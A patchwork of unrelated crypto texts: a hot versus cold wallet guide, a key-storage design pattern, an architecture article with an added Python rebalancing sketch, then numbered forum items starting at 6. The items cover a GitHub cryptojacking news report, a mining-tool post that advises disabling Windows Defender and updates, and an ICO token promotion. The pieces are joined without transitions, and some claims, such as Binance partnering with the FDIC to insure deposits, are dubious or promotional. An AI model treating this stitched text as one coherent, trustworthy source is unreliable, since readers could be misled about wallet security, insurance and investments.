Exodus is the best hot wallet for desktops due to its high transaction speed, ease of use, and diverse client functionalities it provides. It’s one of the most visually appealing and intuitive wallets in the crypto space. It started as a desktop-only wallet but has expanded to support mobile devices. However, the Exodus desktop app for Windows, Linux, and Mac operating systems is still the wallet’s primary offering.

What is a Cold Wallet?

A cold or hardware wallet is a physical device that stores your private keys offline, costing anywhere between $50 and $250. Cold wallets are the most secure type of crypto wallet, as they are not connected to the internet and are therefore unlikely to be compromised by hackers (unless they have access to your private keys AND the hardware wallet).

Hardware wallets are physical devices that may resemble a USB stick or hard drives, which work by storing your pass codes, PINs and private keys on the device itself. In fact, even if the computer is infected with malware, the cold wallet remains safe as its private keys are held in a chip that never connects to the internet. So even if your computer is hacked or your online wallet is compromised, your coins will still be safe… unless your passcode and device are stolen.

However, as cold wallets are physical objects, that also opens them up to the risk of loss through careless handling. In the unfortunate event that your crypto hardware wallet is lost or stolen, you can use your seed phrase to regenerate your private keys. So remember to keep your seed phrases safe, offline, and on hard copy.
As cold wallets are ideal for long-term crypto storage, they’re better suited for hodling crypto than trading funds.

Ledger

(Image source: Ledger Nano X)

Ledger is one of the most popular crypto hardware wallet providers, offering the Ledger Nano X, Ledger Nano S and Ledger Nano S Plus wallets. These devices are about the size of a thumb drive, running on the Ledger operating system called the Blockchain Open Ledger Operating System. It also has an in-built clear OLED display screen interface, and two navigation buttons for confirming transactions. Ledger comes complete with a Ledger Live mobile app and a high level of security with its secure element chip used to store cryptographic data. Their flagship model, the Ledger Nano X, offers cryptocurrency compatibility of more than 5,500 tokens.

Trezor

Trezor is another well-known hardware wallet that offers the Trezor One and Trezor Model T. The Trezor Model T offers compatibility with 1,456 coins and tokens, and comes with the desktop, browser and Android Trezor Suite. Trezor Suite is a user interface which lets you search and buy cryptocurrencies, manage your holdings, and send crypto securely. While this improves the user experience, there is the potential to introduce security vulnerabilities as you are using internet-enabled devices.

Considerations When Choosing a Wallet

Depending on your needs, you may opt for a hot wallet, a cold wallet, or both. We’ve summed up how the three types of wallets covered above compare against each other in this table:

Security

Security is a core feature when choosing a crypto wallet. Blockchain technology is known for its secure and immutable nature; ensuring your wallet has the best security features is necessary. Cold wallets are more secure than hot wallets since they are not always connected to the internet with exposure to potential cybersecurity risks like phishing or other hacks and scams.
Besides, ensure your wallet has two-factor authentication (2FA) functionality to prevent unauthorized access to your assets.

Convenience

Since cold wallets store private keys offline, they involve plugging in physical devices and linking to web-based accounts to transfer funds. On the other hand, hot wallets live online; hence they are much easier to use for everyday transactions, like day trading.

Additional Transaction Fees

You’ll still be subject to gas fees, regardless of which wallet you’re using. However, exchange-based wallets may include an additional charge that is derived from gas prices, although this fee may be waived if you are holding or staking the exchange’s native token. Before downloading or purchasing any wallet, check their service charges first.

Supported Coins

The wallet you plan to use may not support the coin you want to invest in. Some wallets support only one coin! Consider Mycelium, for instance. Despite having exceptional functionalities, it only supports Bitcoin. Therefore, be sure to check the wallet’s list of supported coins and tokens before using it to avoid disappointments.

Insurance

Some custodians provide asset insurance for users who incur losses through a technical problem or theft. Custodians differ in insurance policies, but selecting one that insures your assets in collaboration with a financial institution is advisable. For example, Binance provides insurance for USD deposits of up to $250,000 for U.S. customers. It has partnered with the Federal Deposit Insurance Corporation (FDIC) to implement this policy.

Using Hot and Cold Wallets to Manage Your Crypto Portfolio

Hot wallets are more convenient for daily use than cold wallets. On the other hand, cold wallets guarantee greater security than hot wallets. Both wallets support a broad range of cryptocurrencies. Therefore, the ideal wallet for you depends on whether you prioritize the safety of your funds over the convenience of using a wallet regularly.
You can enjoy both benefits by combining both methods. For instance, you can hold a small percentage of funds in a hot wallet for trading purposes and keep the rest of your funds in a cold wallet as a long-term investment.

As a blockchain network participant, a party can rely on so-called “wallets” to manage its accounts and interaction with the blockchain. A party has multiple keys.

Problem

A party’s wallet is vulnerable to malicious attacks leading to key theft. If compromised, an attacker can use the key to issue transactions in that party’s identity. How to prevent the compromise of keys?

Forces:
• Security – A key may be hacked when being stored in a device, especially when connected to the Internet.
• Usability – Some keys may be frequently used by blockchain participants while other keys may be used infrequently or might act as backup.

Solution

Users can choose to store keys in 2 types of wallets, namely hot wallet and cold wallet. Hot wallet typically refers to the blockchain gateways that are connected to the Internet.

[Figure: Hot and Cold Wallet Storage Pattern]

Through a hot wallet, a user is able to directly issue transactions to the blockchain. Hence, a hot wallet typically holds frequently used keys. Cold wallet refers to key storage that is kept off-line to minimise potential attacks. Thus, a cold wallet typically contains rarely used keys. A cold wallet can be any device disconnected from the Internet or even a paper recording an entity’s keys. When a key stored in the cold wallet is required to sign a transaction, the user needs to connect the cold wallet device to a computer and copy-paste the key in the relevant field.

It is also possible to automate the migration of keys between the 2 wallets based on their frequency of use, e.g., least recently used and most frequently used. Also, a certain key can be marked as critical such that it primarily stays in the cold wallet. When it is required to sign a transaction it can be copied to the hot wallet.
However, as soon as the transaction is signed it should be deleted from the hot wallet. In certain application settings, blockchain platforms, and wallet implementations, it is also possible to sign transactions entirely on the cold wallet and use the hot wallet to issue/relay the signed transactions to the blockchain.

Benefits
• Secure storage – Cold wallets are isolated from the Internet; hence, provide secure storage for keys.
• Usability – Such a secure storage also preserves the usability of keys, as once a cold wallet is connected to the Internet (either directly or via a middleware), a party can utilise those keys.

Drawbacks
• Security – Hot wallets store one’s secret keys online hence are more vulnerable to theft. A cold wallet becomes more vulnerable as soon as it is connected to the hot wallet to copy/migrate a key.
• Usability – Cold wallets are more secure than hot wallets but less convenient to use, as the user has to connect to the cold wallet.

Related patterns
• In the master and sub key generation pattern, the master key can be kept in the cold wallet while sub-keys can be stored in the hot wallet.
• The key sharding pattern could be used in a wallet application to split and merge a key to minimise its compromise.
• When being integrated into wallet applications, predefined delegates in the delegate list pattern can replace key ownership of a compromised key.

Known uses
• MyEtherWallet is a hot wallet with a graphical interface for instant payment and withdrawal in Ethereum.
• Trezor is a cryptocurrency hardware wallet, designed to store and encrypt users’ coins, passwords, and other digital keys. It is a single-purpose computer with independent memory to save all private data.
• Ledger provides hardware wallet products to store users’ private keys in a secure hardware device, protecting the cryptocurrencies.

Explore the different crypto storage options

What are the pros and cons of each wallet?

A hot wallet refers to any cryptocurrency wallet connected to the internet.
Generally, hot wallets are easier to set up, access, and accept more tokens. But they are also more vulnerable to hacker attacks, possible regulations, and other technical vulnerabilities.

Cold Storage refers to any cryptocurrency wallet that is not connected to the internet. Overall, a cold wallet is more secure, but it doesn’t accept as many cryptocurrencies as hot wallets.

Should I Get a Cold Wallet?

If you are going to own Bitcoin, Ethereum, or other cryptocurrencies worth more than $100, you could buy a cold wallet right now — this is how much it costs.

Maybe you’ve heard people say, “Bitcoin gives you this opportunity of being your own bank”? There are advantages and disadvantages to this responsibility. Generally, cryptocurrencies have fewer middleman fees, less messy banking regulations, etc. Still, it is your responsibility to ensure the safety of your assets.

Overall, as a rule, you should leave as much money in your hot wallet as you would with a traditional leather wallet that you keep in your pocket. Think of it this way, if a thief was about to steal your regular wallet, you would only lose the money you have in your pocket, not the money in your bank account. In short, here’s an analogy that can help you: a hot wallet can be thought of as a pocket wallet that you walk around town with; a cold wallet is a bank deposit.

Pros & Cons of Hot Wallets

Using a hot wallet will give you the following benefits:
• By entering your pin and access number into the wallet, you quickly access your coins.
• The investment cost is lower.
• It has an extensive portfolio of applications or software that function as a hot wallet.
• You need to set a PIN code or a security code to use it.
• They allow you to connect to any platform so you can operate and trade.

Using one of these wallets may have the following disadvantages:
• Higher risk of theft as money is stored in the cloud and is more vulnerable to cyber crooks.
• It needs to be connected to the internet all the time.
Otherwise, it can’t be supported, so it could be a big problem if the internet connection fails.

Pros & Cons of Cold Wallets

Using this wallet will give you the following benefits:
• This type of wallet works without the internet, giving you a high level of security since many thefts take place on the internet.
• A cold wallet supports ERC20 or other token standards, which can support an unlimited number of tokens.
• You need to set a PIN code or a security code to use it.
• You can take your device anywhere.

Using one of these wallets may generate the following disadvantages:
• There is a risk of losing your device.
• You cannot trade with these types of devices.
• You need to invest around $100 to get it.
• Like any physical device, it is prone to failure, corruption, or reading problems.

Remember that if you want to trade, a hot wallet is the better option. Still, we recommend encrypting it as best you can and choosing the best software for the most significant security. On the other hand, if you are a non-trading investor and want the highest level of protection, a cold wallet will be a better choice.

Hot and cold wallets are both necessities for safely storing your crypto assets. While the former is used to send and receive crypto tokens, the latter securely holds your accumulating cryptocurrencies without vulnerabilities. As hot wallets require an internet connection to send and receive tokens, they are largely at risk of crypto attacks that prove to be hugely expensive. So, they cannot hold a large sum of tokens. Here is where the usage of cold wallets comes into play.

Utilizing both hot and cold wallets is a safe practice in crypto vulnerability management, leaving no loopholes for attackers. Let us understand the hot and cold wallet architecture and how it should be set up to mitigate the risk of vulnerabilities.

• What are hot wallets?
• What are cold wallets?
• Hot wallet vs Cold Wallet: Differences
• Hot and cold wallet setup
• How does hot and cold wallet interact?
• How do hot and cold wallet setups in big systems work?

What are hot wallets?

Hot wallets are crypto wallets that are always connected to the internet and are more easily accessible for users than cold wallets. They can be mobile, desktop or web-based wallets, and are user-friendly and facilitate easy transfer of currencies between crypto users. Private keys are kept and encrypted on the app itself in hot wallets and stored online. It has hidden vulnerabilities, and hackers can target it to break into the system. Due to its ease of use, it is the most preferred wallet for buying and trading cryptocurrencies or cashing out assets after a while.

How does a hot wallet storage work?

When you install a hot wallet storage onto your computer or device, it allows you to buy, send and receive crypto assets without really holding any crypto. Rather, it holds the private keys with which a user can initiate transactions. This is possible, as it interacts with the blockchain storing your assets.

MetaMask is one of the most popular hot wallets available today. So, we will explain how a hot wallet works using MetaMask. MetaMask is available as a web browser extension that acts as a bridge between the blockchain, especially Ethereum, and your browser. When you download and install MetaMask and add it as your browser extension, you will be asked to either ‘import wallet’ or ‘create a wallet.’ Import wallet allows you to add an existing wallet by typing a secret recovery phrase, while the latter enables creating a new crypto wallet.

If you create a new wallet, you need to set a new MetaMask password to secure the app or platform on your device. This password can be a string of characters, face recognition, or even a fingerprint that you can regularly use to access the app, instead of a secret recovery phrase. Once you create a password, you must copy the secret backup phrase and paste it or write it down in a safe place.
For each account you have in your MetaMask wallet, you will be provided with a private key. You can unlock your cryptocurrencies using this private key.

What are cold wallets?

Cold wallets are hardware-based and exist offline. Although a cold wallet is not as convenient to use as a hot wallet, it is far more secure. Using this offline wallet keeps your keys entirely protected from online hackers. Cold wallets can be paper wallets or hardware devices. A paper wallet is a traditional way of keeping private and public keys written down or printed on paper. It is a safe way to store keys as it is not prone to phishing attacks. Hardware wallets are external devices in the form of a USB or Bluetooth device that stores your keys.

As they offer less liquidity, cold wallets are best for people planning to buy and hold their crypto assets for a long period. To do transactions between an offline cold wallet and an online hot wallet, you need to connect the hardware device to another device with internet accessibility, mostly a computer, using a plug, then transfer the required amount from the cold wallet to the hot wallet.

How does a cold wallet storage work?

A cold wallet, on its own, cannot connect to a blockchain and complete a transaction. When a user wants to use a cold wallet for transactions, it needs to be connected to a device with an internet connection. However, this does not put your private key under security threat. Let us see how it works.

A cold wallet storage can be roughly divided into two components, a cold wallet core and a cold gateway. While a cold wallet core has no internet access and is completely air-gapped, a cold gateway is connected to the internet. A transaction is created in the cold gateway in a cold wallet, which is then signed in the offline cold wallet core.
So, if a user wants to send x number of tokens to another wallet, the transaction will be created in the cold gateway with an internet connection, but the transaction signing will be done offline. After the transaction is signed, it is disclosed or broadcast online in the cold wallet core.

Let us take the example of the cold wallet ELLIPAL to understand this better. ELLIPAL is an air-gapped hardware wallet that is essentially a secure cold wallet. It is entirely isolated from the internet and is designed to prevent unauthorized access, hacks, malware and other online attacks. So, to initiate transactions, the users need to install the ELLIPAL mobile app, acting as a proxy for it to connect to the blockchain.

The whole process of transactions via an ELLIPAL wallet can be summarized into the following steps:
• The user initiates a transaction on the app.
• The app asks for confirmation from the cold wallet.
• The hardware wallet signs the transaction via a private key.
• After approval, the app completes the transaction.

Hot wallet vs Cold Wallet: Differences

Feature | Hot Wallet | Cold Wallet
Internet Connectivity | Online | Offline
Accessibility | Easily accessible | Low accessibility
Tangibility | Software-based wallets; so, intangible | Physical wallets; so, tangible
Types | Mobile, web or desktop wallets | Paper or hardware wallets
Safety | Prone to hacking and attacks. So, less secure. | Less threat from hacking and attacks. So, more secure
Convenience | Easy and convenient | Less convenient
Cost | Less expensive | More expensive
Usability | Best to store a small amount of crypto | Best to store large amounts of cryptocurrency

Hot and cold wallet setup

Although using a hot wallet for transactions is easy and convenient, it cannot be used to keep a large number of cryptocurrencies due to security threats. It is advisable to store your large amount of cryptocurrencies in cold wallets as they are the least vulnerable to security threats, such as malware attacks and phishing.
One important way of setting up wallets to avoid risks is to combine both hot and cold wallets, which reduces your funds’ online exposure. In this, each wallet is set up for different purposes. The hot wallets serve as the receiving wallet and sending wallet. The receiving wallet will manage the funds coming to the exchange, while the sending wallet will be used to send cryptos for transactions and trade.

As both the sending and receiving wallets will be hosted on online servers, the number of funds kept in both wallets should be minimized to reduce the risks of crypto vulnerability. The rest of the cryptos should be stored in your cold wallet. Doing this can ensure that most of your asset is safe in case of any security compromises.

How does hot and cold wallet interact?

As all of the funds that are transferred to you come to your receiving wallet, there are chances of crypto accumulation in your receiving wallet, resulting in crypto vulnerabilities. So, you need to send most of it to the cold wallet and some to the sending wallet. You need to have a minimum amount in your receiving wallet to transfer to the sending wallet once it falls short of cryptos, and this ensures that the sending wallet has enough cryptos whenever needed. However, suppose funds are not reliably coming to the receiving wallet, and the sending wallet urgently needs currencies. In that case, you can transfer the required amount from the cold wallet to the sending wallet.

How to mitigate crypto vulnerability?

Assume that you have a total of 200 ETH in your possession, and at any time, you want to avoid risking more than 30% of your funds. Based on this calculation, you need to set maximum and minimum thresholds per wallet to reduce the severity of any malware attack. So, the receiving wallet should have a minimum of 10 ETH and a maximum of 20 ETH. Similarly, the sending wallet should possess at least 20 ETH and up to 40 ETH. The rest of your assets should be kept in the cold wallet.
If you set a threshold for your sending and receiving wallets, adhere to it and ensure that the set amount does not exceed or drop below the limit. Excess funds are prone to vulnerabilities, and you cannot produce the required amount when needed if it is below the limit. So, always maintain an adequate amount of funds.

How do hot and cold wallet setups in big systems work?

Hot and cold wallet setups vary, and each setup is designed based on the developer’s requirements and thought process. Through the following infographics, let us understand how hot and cold wallet setups are designed in big systems.

In the above-given infographic, if a person wants to send x number of tokens to another user, they input a request in the front end of the application, which is fetched in the API layer or the backend of the app. The backend transfers the input request to the wallet server. In a typical wallet architecture, a wallet server handles multiple microservices like managing nodes, databases, APIs or transaction services. As the user input, in this case, is related to the transaction service, the request is sent to this microservice. The transaction service then sends the request to the wallet microservices, which handle all services related to the wallet.

The wallet microservices can vary from platform to platform. In the above infographic, the wallet microservices include the following:
• Fund management for the hot wallet – It ensures that it always sticks to its threshold without crypto overflow or deficit to prevent risk exposure.
• Whitelisted IPs – It limits the number of people who can access your domain or server to a few trusted IP addresses permitted by you.
• Token – It manages and keeps track of your tokens, like x number of ETH or x number of SOL.
• Service monitoring – This microservice checks whether all services are working without glitches.
• Thresholds – These ensure that you have the required amount in your wallet or not to send it to others.
2-step authentication – It is a security process where you have to verify your identity twice before accessing the wallet ecosystem.
Notifications – It alerts users on important matters like successful transaction completion notifications.
KMS – Key management system or KMS helps create, store, and manage keys safely.
Rotate hot wallet

When the transaction input is transferred from the transaction service to the wallet microservices, all of the above microservices are carried out. Once all the services are done, and it is ascertained that your hot wallet has a sufficient number of tokens, the x number of tokens is sent to the receiver. The transaction is then said to be successfully completed.

Conclusion

Merging both hot and cold wallets can help mitigate the risk of crypto attacks for both the users and the service providers. It acts as a comfortable middle ground by offering the benefits of both wallets, where one is used for crypto trading, and the other is used to hold the cryptos safely. Even though only hot wallets were popular during the initial days of crypto emergence, usage of cold wallets is getting more popular these days. Moreover, blending hot and cold wallets is gradually gaining prominence among crypto experts and service providers, owing to its huge benefits. Using just one wallet is, thus, outdated, and people gradually realize the advantages of combining both hot and cold wallets as an additional security measure.

GitHub
Telegram: https://t.me/cryptodeeptech
Video: https://youtu.be/NrQ3oNxlrlU
Source: https://cryptodeep.ru/cold-and-hot-wallets

Cryptanalysis
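The threshold rule from the post above, as an added example that is not part of the original post: a Python sketch that plans transfers between the receiving, sending and cold wallets using the post's 200 ETH figures. The function names, the sample balances and the choice of sweep and top-up targets are assumptions of this sketch.

```python
from decimal import Decimal as D

# Thresholds from the post's 200 ETH example: (minimum, maximum) in ETH.
LIMITS = {"receiving": (D(10), D(20)), "sending": (D(20), D(40))}
MAX_HOT_SHARE = D("0.30")  # never risk more than 30% of funds online

def hot_share(bal):
    """Fraction of all funds currently held in the two hot wallets."""
    hot = bal["receiving"] + bal["sending"]
    return hot / (hot + bal["cold"])

def rebalance(bal):
    """Return (transfers, new_balances); each transfer is (src, dst, amount).

    Assumed policy: a short sending wallet is topped up to its minimum,
    an overfull receiving wallet is swept down to its minimum, and an
    overfull sending wallet is swept down to its maximum.
    """
    bal = dict(bal)  # plan on a copy; the caller's balances are untouched
    moves = []

    def move(src, dst, amount):
        if amount > 0:
            bal[src] -= amount
            bal[dst] += amount
            moves.append((src, dst, amount))

    rmin, rmax = LIMITS["receiving"]
    smin, smax = LIMITS["sending"]

    # 1. Sending wallet short: use receiving-wallet surplus first, then cold.
    need = smin - bal["sending"]
    if need > 0:
        from_recv = min(need, max(bal["receiving"] - rmin, D(0)))
        move("receiving", "sending", from_recv)
        move("cold", "sending", min(need - from_recv, bal["cold"]))

    # 2. Receiving wallet over its cap: sweep the surplus to cold storage.
    if bal["receiving"] > rmax:
        move("receiving", "cold", bal["receiving"] - rmin)

    # 3. Sending wallet over its cap: sweep the excess to cold storage.
    if bal["sending"] > smax:
        move("sending", "cold", bal["sending"] - smax)

    return moves, bal

if __name__ == "__main__":
    # Constructed sample: deposits piled up while the sending wallet drained.
    sample = {"receiving": D(55), "sending": D(12), "cold": D(133)}
    plan, after = rebalance(sample)
    print(plan, after, hot_share(sample), hot_share(after))
```

The function only produces a plan; any transfer whose source is `cold` still has to be signed wherever the cold keys are kept.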
  6. Hackers used GitHub's cloud infrastructure for covert cryptocurrency mining. The cryptojacking attack has been under way since autumn 2020 and affected the GitHub Actions feature.

The code hosting service GitHub is investigating a series of attacks on its cloud infrastructure. These attacks allowed cybercriminals to use the company's servers for covert cryptocurrency mining operations and were first discovered by a French software engineer in November of last year.

The cryptojacking attack affected a GitHub feature called GitHub Actions. This feature lets users automatically run tasks and workflows that are triggered by a specific event occurring inside their repositories.

To launch the cryptocurrency mining software, the attackers forked an existing repository, added a malicious GitHub Actions element to the source code, and then sent a Pull Request to the original repository to merge the modified code back.

Read more: https://bits.media/servery-github-podverglis-atake-kriptodzhekinga/
  7. The GitHub team will put the open source code of major projects, including Bitcoin Core and Ethereum, on film and send it for storage in an abandoned mine on Svalbard.

GitHub is arranging storage of the open source code of Bitcoin and other cryptocurrency projects in an abandoned coal mine on Svalbard. The archives, stored at a depth of 250 meters, will include the code of Bitcoin Core, the most popular implementation of Bitcoin's base infrastructure code, in one of the most frequently used repositories on GitHub.

The repositories of cryptocurrency projects will be archived together with the source code of many other projects in various fields. As part of the archive program to protect an important part of technological history, a "snapshot" of all this code will be copied onto reels of film and stored in a steel container. All of this is being done so that the data remains intact for 1000 years.

The GitHub team is currently preparing the data for storage. Placing the archives in the vault is scheduled for the end of April, a GitHub representative told CoinDesk. Besides Bitcoin Core, most cryptocurrency projects hosted on GitHub will also be included in the archive, including the code of Lightning Network, Ethereum and Dogecoin.

Archiving this information is supported by the non-profit organizations Internet Archive and Long Now Foundation, as well as by historians, anthropologists and other scholars.

Read more: https://bits.media/github-arkhiviruet-kody-kriptovalyutnykh-proektov-v-zabroshennoy-shakhte-na-shpitsbergene/
  8. Swiss company Neurogress, developer of the notorious software for neurocontrol of gadgets, has finally published the source code of its program on GitHub. The version made available to the public is integrated with Microsoft Windows and intended for use with an ordinary Muse neurointerface. For inexperienced users there are step-by-step instructions for installing and running the program.

https://github.com/Neurogress/GettingData

In addition, the company announced the launch of the "NeuroControl Customer Manual" (NCCM) / "A Row Recruit Manual" program, a collection of video and text materials that serves as a kind of user guide for all participants in the Neurogress neurocontrol ecosystem.

Learn more: https://neurogress.io/
Telegram - https://t.me/neurogress
Source: https://ico-promo.livejournal.com/2549.html
  9. Fast multipool and multialgo windows miner https://github.com/1001rapid/RapidMiner

Not exactly an analogue, although if you use the program only on Nice, it is pretty much an analogue, plus you get the ability to use new miners. In short, it is a program for working with multipools. It chooses where to mine based on data from WTM.

--==[A bit of history]==--

While Nice was shut down, I spent a long time looking for something similar and by chance (via a link on one of the multipools) came across a wonderful program, Megaminer by Tutulino. Its main difference from other similar programs was that you could create groups of video cards, which was very useful not only with a mixed bag of cards but even when they were all identical, because the card the system uses for display output was much less stable than the rest, and for it you wanted to exclude some algorithms that led to driver crashes and other joys. This small feature made the program very similar to NiceHashMiner, which also has the wonderful ability to configure each card separately. All would have been fine, but the author began introducing new features and reworked the way it operates so that each new miner work cycle started taking more and more time. From 5 to 20 minutes. This became so annoying that I decided to write my own program.

As the basis I took Megaminer version 5.0, which still had the log file that is essentially a screenshot of the program's main window. This is very convenient for monitoring rigs on a local network: you don't have to log in to the machines with remote access programs; you can open the log file with any console file manager, scroll to the end and watch the program window in real time through a text file. Here is the monitoring of two machines:

But since I want new features too, I add them when I can.

--==[System requirements]==--

Hardware:
CPU - minimum .) I use old motherboards with all sorts of dual-core Intel and AMD
HDD - from 60 GB (optimally 80 or more), program: 500 MB + system + page file from 32 GB
RAM - 2 GB

OS: I use Windows 7 SP1 x64 everywhere, Tutulino tests on 10

Software:
PowerShell v5.0
CUDA 9 (some miners require it; you can exclude them if you don't want to install the latest drivers (CUDA 9 starts with version 387 and higher), because problems usually start with them; for example, on the 1050 Ti the current power draw stopped being displayed (by my data, the last stable driver version for it is 384.94))

What I install on a bare Windows 7 so that everything is guaranteed to work:
CCleaner (helps with small disks)
ESET Smart Security (Firewall) - I enable only host protection and the Firewall (first day - learning mode)
SP1 (KB976932)
D3DCompiler - needed for .NET Framework install (KB4019990)
Microsoft .NET Framework 4.7 - web install (KB3186500)
Microsoft Visual C++ 2005-2017 (VCredist)
Update for Universal C Runtime (KB2999226)
Windows Support Tools (??? some miner asked for it)
Windows Management Framework 5.0 includes updates to Windows PowerShell (KB3134760)

Windows Defender is turned off, updates are turned off.

--==[Installation and setup]==--

1. Download the latest release from https://github.com/1001rapid/RapidMiner (the green "Clone or download" button, then "Download ZIP") and unpack it into, say, a "RapidMiner" folder.
2. Edit the CONFIG.TXT file.
3. Run the batch file. The simplest option, which I use (all coins in automatic mode on the selected pools), is _RapidMiner.bat (just choose the pools you need). !!! Pool names must be written exactly as the corresponding files in the Pools folder are named. There are also example batch files for solo mining and for mining several coins. You can do everything manually by running START.
4. On first launch the miners are downloaded (everything is downloaded from GitHub) and installed.
5. Also on first launch the miners are benchmarked. The process is long. The result is written to the "Stats" folder separately for each GPU group, if you configured groups in step 2. I recommend going through this step for each group separately (i.e. activating one group at a time); that makes it easier to identify an unstable miner, which is excluded by editing the file with the test results and putting in a deliberately low number.
6. Further configuration:
- a miner can be excluded completely by deleting its file from the "Miners" folder (or, better, moving it to the "Additional Miners" folder);
- a pool can likewise be excluded by deleting its file from the "Pools" folder, but it is better to remove it from the launching batch file;
- before a miner starts you can add the launch of other programs (settings tools, for example) by adding a command line to the "PrelaunchCommand" field of the corresponding miner (it doesn't always work, but it might be useful to someone).

------

I'll say right away that I make this for myself and decided to share it here with colleagues in case someone else likes it, so support is in the "use what there is" format ), but you can ask questions and I will help where I can. Version 1.2, improved and refined, is on its way and is currently being tested.
  10. Golos.fund is giving away money. Wanted: 100% open source code, MVPs and Graphene technologies for integration into the Golos blockchain. Come up with an idea, take part, build it! Win a prize fund that will change your life!
  11. Dogezer. DoSoftwareTogether

Dogezer is a platform that lets team members be investors by investing their labor and time

Links: website | whitepaper | prototype video | blog | twitter | facebook | slack | telegram
email: community@dogezer.com
Dogezer main topic [ENG]
Bounty campaign (main topic) [ENG]
Dogezer Russian-language topic [RUS]
Bounty campaign [RUS]

The ITO starts on January 15, 2018
ITO stands for Initial Token Offering
___________________________________________________________________________
We have combined Github, Upwork, Slack, Jira, Dropbox and Google Docs into one product.
We have added a financial system with the ability to create an in-project coin.
You create your software project on our platform and pay your team with these coins, OR
you work on a product and receive coins, which are a share of ownership of/revenue from the product

A unique token model
___________________________________________________________________________
• The DGZ token is converted into platform services.
• The conversion rate depends on the number of DGZ tokens in existence.
• We partially burn DGZ tokens when you use them on the platform, so the conversion rate grows.
• The conversion rate starts at 4x: 4 dollars' worth of services for 1 DGZ token ($0.7 - $1 per DGZ at the ITO)
More details here: whitepaper

Stages
___________________________________________________________________________
September 1: PreITO starts
September 30: PreITO ends
November 15: Alpha release
January 15, 2018: ITO starts
February 15, 2018: ITO ends
July 2018: Open Beta release
December 2018: Official release of Dogezer 1.0

The Dogezer product
___________________________________________________________________________
• The product is almost ready
• A technically strong team
• A year of development behind us
• A working Alpha version - video
• First open test in November 2017
• Fully functional Beta version in July 2018

Dogezer ITO
___________________________________________________________________________
• Total tokens: 100,000,000
• PreITO: 2,000,000 PreDGZ tokens at $0.7 in ETH
• ITO: 96,000,000 DGZ tokens at $0.9-$1.0 in ETH
• Minimum volume: 1,000,000 USD
• Founders' share: 0.5%
• Unsold tokens are burned
• The team is working on escrow.

Learn more
website | whitepaper | prototype video
blog | twitter | facebook | slack | telegram
email: community@dogezer.com
Dogezer main topic [ENG]: https://bitcointalk.org/index.php?topic=2100916.0
Bounty campaign (main topic) [ENG]: https://bitcointalk.org/index.php?topic=2108930.0
Bounty campaign [RUS]: https://bitcointalk.org/index.php?topic=2113938.0

Join our slack to stay up to date
We will be glad to answer all your questions!
  12. Software developer WhisperSystems has announced an integration of Bitcoin with GitHub, a resource known to every programmer that hosts many open-source software development projects. The integration will take the form of a service, BitHub, which will offer open-source developers payment in bitcoins for contributing to the company's projects.

WhisperSystems develops free applications for encrypting storage, messages and calls on the Apple and Android platforms. All of these applications are open source and kept in public repositories. Users who are interested in such applications fund their development themselves. The company therefore decided to add support for donations in Bitcoin, since they are anonymous and do not require the formalities associated with payments in, for example, dollars.

On BitHub it will also be possible to direct donations to a specific project and see exactly what they were spent on. In the future, independent projects may also be hosted on BitHub.

Source: http://www.coindesk.com/bithub-pays-open-source-developers-bitcoin